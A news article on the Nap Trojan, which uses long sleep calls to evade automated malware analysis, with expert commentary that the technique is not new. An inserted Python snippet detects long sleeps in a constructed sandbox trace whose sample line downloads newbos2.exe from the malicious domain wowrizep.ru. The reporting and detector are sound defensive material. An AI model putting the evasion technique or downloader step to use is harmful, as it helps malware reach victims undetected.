'Sleeper' malware like Nap Trojan nothing new

Some malware designers hope to catch their victims unaware, or "sleeping." The makers of the Trojan Nap hope to snare them by having their creation go to sleep itself.

But several security experts say that is nothing new. They criticized a blog post earlier this week by FireEye security researchers Abhishek Singh and Ali Islam, who said they had discovered "a stealthy malware that employs extended sleep calls to evade automated analysis systems (AAS) capturing its behavior."

They said Trojan Nap also uses "fast flux technique" to hide the identity of the attackers, which is similar to the behavior of the malware used to attack The New York Times. In that case, a university computer was manipulated to use different IP addresses from around the world, making it more difficult to find the correct one and block the source of the attack or even identify a clear pattern of malicious activity.

"Botnets have been using fluxing techniques for years in order to evade statically compiled black lists," said Manos Antonakakis, senior director of research at Damballa Labs. "Also, anti-VM analysis techniques are a common phenomenon in the current malware landscape. [And] evading signature and dynamic analysis systems is not particularly hard at this point."

Antonakakis was also critical of the comparison to the attack on The Times, which was made without first providing explicit and extensive forensic evidence. "It's irresponsible, it creates problems for the global security community and makes the future data sharing efforts between security companies harder, if not impossible," he said.

The Trojan Nap is "a commodity botnet -- the malware is not overly sophisticated," he added.

Amrit Williams, CTO at Lancope, said, "Malware using automated analysis and network evasion techniques isn't new or even that rare. Zeus, which was continually evolving, used several techniques to evade monitoring tools, including the Windows firewall."

Singh and Islam did call the Trojan Nap a "classic technique used to stay under the radar of an automated analysis system." And Singh told CSO Online on Wednesday that, like others, "we have been observing extended sleep calls in other malwares also for quite some time."

They reported that after the malicious code gets executed, it sends an HTTP request to the domain "wowrizep.ru" requesting the file "newbos2.exe."

It is then programmed to take a 600,000 millisecond, or 10-minute, timeout. "Since automated analysis systems are configured to execute a sample within a specified time frame, by executing a sleep call with a long timeout, Nap can prevent an automated analysis system from capturing its malicious behavior," Singh and Islam wrote.


Although the technique is a classic one, the automated analysis systems industry has not developed ways to sniff it out.

Bogdan "Bob" Botezatu, a senior e-threat analyst at Bitdefender, said it is a matter of efficiency. Antivirus emulators and automated analysis systems are designed not to waste CPU cycles and resources, he said. "They are designed to handle tens of thousands of possibly malicious samples, and can't afford to wait on a file that apparently does nothing."

So it is not something that will change overnight. "There is no reasonable way to circumvent this unless the automated system is willing to trade efficiency," Botezatu said.
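The evasion described above (a 600,000 ms sleep that outlasts a sandbox's execution window) and the efficiency trade-off Botezatu describes can both be made concrete with a small triage check over a sandbox API trace. This is an added example, not code from FireEye, Damballa or Bitdefender; the trace format, the sample trace lines and the 120,000 ms window are constructed assumptions.

```python
import re
from typing import NamedTuple

# Constructed sandbox API trace, loosely modelled on the article's description of
# Nap (HTTP request for newbos2.exe, then a 600,000 ms sleep). The line format
# "<ms since start> <api>(<args>)" is an assumption, not any real tool's output.
SAMPLE_TRACE = """\
0012 CreateFileW("C:\\Users\\victim\\AppData\\Local\\Temp\\nap.exe")
0031 InternetOpenUrlA("http://wowrizep.ru/newbos2.exe")
0045 Sleep(600000)
0046 SleepEx(1000, 0)
0047 WriteFile("newbos2.exe")
"""

# Sleep(dwMilliseconds) and SleepEx(dwMilliseconds, bAlertable): the first
# argument is the timeout in milliseconds in both Win32 APIs.
SLEEP_RE = re.compile(r"^\s*(\d+)\s+(Sleep|SleepEx)\((\d+)")


class SleepReport(NamedTuple):
    total_ms: int      # cumulative requested sleep time
    longest_ms: int    # largest single timeout seen
    count: int         # number of sleep calls
    evades_window: bool  # would the sleeps outlast the sandbox window?


def analyze_sleeps(trace: str, window_ms: int) -> SleepReport:
    """Sum the sleep timeouts in an API trace and decide whether they push the
    sample's real behaviour past the sandbox's fixed execution window.

    Flagging on the cumulative total (not just the longest call) also catches
    many short sleeps chained together, a generalization of the single
    10-minute sleep the article describes.
    """
    durations = [int(m.group(3)) for line in trace.splitlines()
                 if (m := SLEEP_RE.match(line))]
    total = sum(durations)
    longest = max(durations, default=0)
    return SleepReport(total, longest, len(durations), total >= window_ms)


if __name__ == "__main__":
    # Assumed sandbox window: two minutes per sample.
    print(analyze_sleeps(SAMPLE_TRACE, window_ms=120_000))
```

A sample whose requested sleep alone exceeds the window has shown the sandbox nothing useful, which is exactly the case where an analyst would want the file re-run with sleeps shortened or the clock advanced rather than discarded as "doing nothing".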

But Singh said he thinks automated systems "should have evolved to ensure that malware should not be able to use extended sleep calls to bypass capturing of its behavior."

Antonakakis said antivirus product makers should be up to speed. "[They] should be paying attention to the network behavior and the ecosystem around Internet threats," he said. "Binaries employ several different obfuscation techniques, so tracking them in the context of botnets is extremely hard."

However, he said that, based on previous analysis of this malware from the community and on his company's own datasets, they believe that this threat is related to the Kelihos botnet. "We believe that the downloader being used is just one component in this campaign," Antonakakis said.

Singh said automated systems are still the fastest way to determine the nature of a file. "But besides capturing the behavior, automated analysis systems should have techniques such that they cannot be evaded," he said.

Antonakakis said: "Let's put it another way: If you rely on seeing the malware, you have already lost the war."

Stories by Taylor Armerding